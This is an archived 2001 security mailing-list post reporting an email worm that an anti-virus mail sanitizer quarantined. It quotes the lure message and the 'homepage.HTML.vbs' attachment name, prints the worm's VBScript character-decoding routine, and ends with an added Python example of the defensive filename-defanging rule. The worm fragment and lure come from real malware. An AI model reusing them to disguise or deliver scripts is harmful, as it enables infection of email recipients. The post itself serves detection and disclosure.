[Esa-l]Here's a new one....

Brett Glass brett at lariat.org
Wed May 9 08:20:17 PDT 2001


Here's a Trojan I've never seen before.... Both our own ruleset
and John's sanitizer triggered on it (output from John's is shown). 
It looks to have been generated by the same toolkit that was used 
to create the Anna Kournikova worm.

--Brett

Date: Wed, 9 May 2001 02:13:14 -0600 (MDT)
Message-Id: <200105090813.CAA23211 at lariat.org>
To: brett at lariat.org
From: "Procmail Security daemon" <postmaster at lariat.org>
Subject: SECURITY WARNING - possible email attack
X-Loop: EMAIL SECURITY WARNING lariat.org 
X-UIDL: f3041bcb8121dd7a2771ec7e8c0cf7f8

REPORT: Trapped poisoned executable "homepage.HTML.vbs"
REPORT: Not a document, or already poisoned by filename. Not scanned for macros.
STATUS: Message quarantined in /dev/null, not delivered to recipient.

Message:

> From edelinetan at stegami.com  Wed May  9 02:13:13 2001
> Return-Path: <edelinetan at stegami.com>
> Received: from stegami.com ([203.126.135.249])
> 	by lariat.org (8.9.3/8.9.3) with SMTP id CAA23202
> 	for <brett at lariat.org>; Wed, 9 May 2001 02:13:11 -0600 (MDT)
> Received: from stegamiedeline ([155.69.174.33]) by stegami.com ; Wed, 09 May 2001 16:27:42 +0800 SGT
> From: "Edeline Tan" <edelinetan at stegami.com>
> To: "BRETT GLASS" <brett at lariat.org>
> Subject: Homepage
> Date: Wed, 9 May 2001 16:20:31 +0800
> Message-ID: <028a01c0d860$e99c2b80$21ae459b at stegamiedeline>
> MIME-Version: 1.0
> X-Security: Warning! Do not open files attached to e-mail if you do not
> 	have an up-to-date virus protection program or did not expect to
> 	receive them. Even if the message is from someone you know, an
> 	attachment can contain a virus sent without his or her knowledge.
> Content-Type: multipart/mixed;
> 	boundary="----=_NextPart_000_028B_01C0D8A3.F7BF6B80"
> X-Priority: 3 (Normal)
> X-MSMail-Priority: Normal
> X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
> Importance: Normal
> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
> 
> This is a multi-part message in MIME format.
> 
> ------=_NextPart_000_028B_01C0D8A3.F7BF6B80
> Content-Type: text/plain; charset="iso-8859-1"
> Content-Transfer-Encoding: 7bit
> 
> 
> Hi!
> 
> You've got to see this page! It's really cool ;O)
> 
> 
> ------=_NextPart_000_028B_01C0D8A3.F7BF6B80
> Content-Type: TEXT/PLAIN;
> X-Content-Security: [lariat.org] NOTIFY
> X-Content-Security: [lariat.org] REPORT: Trapped poisoned executable "homepage.HTML.vbs"
> X-Content-Security: [lariat.org] QUARANTINE
> Content-Description: SECURITY WARNING
> 
> SECURITY WARNING!
> The mail system has detected that the following
> attachment may contain hazardous executable code,
> is a suspicious file type or has a suspicious file name.
> Contact your system administrator immediately!
> 
> Content-Type: application/octet-stream; name="homepage.HTML.23208DEFANGED-vbs"
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: attachment; filename="homepage.HTML.23208DEFANGED-vbs"
> 
> Function DeCode(Coded)
> For I =3D 1 To Len(Coded)
> CurChar=3D Mid(Coded, I, 1)
> If Asc(CurChar) =3D 15 Then
> CurChar=3D Chr(10)
> ElseIf Asc(CurChar) =3D 16 Then
> CurChar=3D Chr(13)
> ElseIf Asc(CurChar) =3D 17 Then
> CurChar=3D Chr(32)
> ElseIf Asc(CurChar) =3D 18 Then
> CurChar=3D Chr(9)
> Else
> CurChar =3D Chr(Asc(CurChar) - 2)
> End If
> DeCode =3D DeCode & CurChar
> Next
> End Function
> 
> ------=_NextPart_000_028B_01C0D8A3.F7BF6B80--
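The "poisoned by filename" rule the report applies, as an added Python example (not the sanitizer's own code): it walks a constructed message shaped like the one above, traps any attachment whose final extension is executable regardless of the harmless-looking extension in front of it, and renames it the way the report shows. The extension list and the numeric tag (the report's 23208, assumed here to be a per-message identifier) are assumptions.

```python
import email
from email import policy
from email.message import EmailMessage

# Extensions a sanitizer treats as "poisoned by filename": the name alone is
# enough to quarantine, no macro or content scan needed. This list is an
# assumption for the example, not the sanitizer's real configuration.
EXECUTABLE_EXTENSIONS = {"vbs", "vbe", "js", "jse", "wsf", "wsh",
                         "exe", "com", "bat", "cmd", "scr", "pif", "shs"}


def is_poisoned_filename(filename: str) -> bool:
    """True when the last extension is executable ("homepage.HTML.vbs"):
    the double-extension trick relies on readers stopping at ".HTML"."""
    parts = filename.lower().rsplit(".", 1)
    return len(parts) == 2 and parts[1] in EXECUTABLE_EXTENSIONS


def defang_filename(filename: str, tag: int) -> str:
    """homepage.HTML.vbs -> homepage.HTML.<tag>DEFANGED-vbs, so no client
    will map the renamed attachment to a script host by extension."""
    stem, ext = filename.rsplit(".", 1)
    return f"{stem}.{tag}DEFANGED-{ext}"


def sanitize(raw: bytes, tag: int) -> tuple[list[str], EmailMessage]:
    """Return the REPORT lines and the message with poisoned names defanged."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    reports = []
    for part in msg.walk():
        name = part.get_filename()
        if name and is_poisoned_filename(name):
            reports.append(f'REPORT: Trapped poisoned executable "{name}"')
            new_name = defang_filename(name, tag)
            part.set_param("name", new_name, header="Content-Type")
            part.set_param("filename", new_name, header="Content-Disposition")
    return reports, msg


def build_sample() -> bytes:
    """Constructed message mirroring the quarantined one (placeholder body)."""
    m = EmailMessage()
    m["From"] = "sender@example.invalid"
    m["To"] = "recipient@example.invalid"
    m["Subject"] = "Homepage"
    m.set_content("Hi!\n\nYou've got to see this page! It's really cool ;O)\n")
    m.add_attachment(b"' placeholder, not the worm script\r\n",
                     maintype="application", subtype="octet-stream",
                     filename="homepage.HTML.vbs")
    return bytes(m)


if __name__ == "__main__":
    found, cleaned = sanitize(build_sample(), 23208)
    print("\n".join(found))
```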